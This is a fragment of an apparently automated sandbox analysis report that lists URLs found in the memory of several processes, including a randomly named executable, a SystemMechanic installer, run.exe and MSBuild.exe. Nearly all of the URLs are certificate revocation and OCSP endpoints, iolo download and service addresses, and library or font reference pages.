Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000002.00000000.1783099524.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1863586625.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2259125869.000000000031C000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: MSBuild.exe, 0000000D.00000002.2875147556.0000000003201000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.00000000025DB000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u5ek.3.exe, 00000006.00000003.2249141509.0000000002606000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.0000000002669000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.00000000026A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913830974.000002721BAF0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
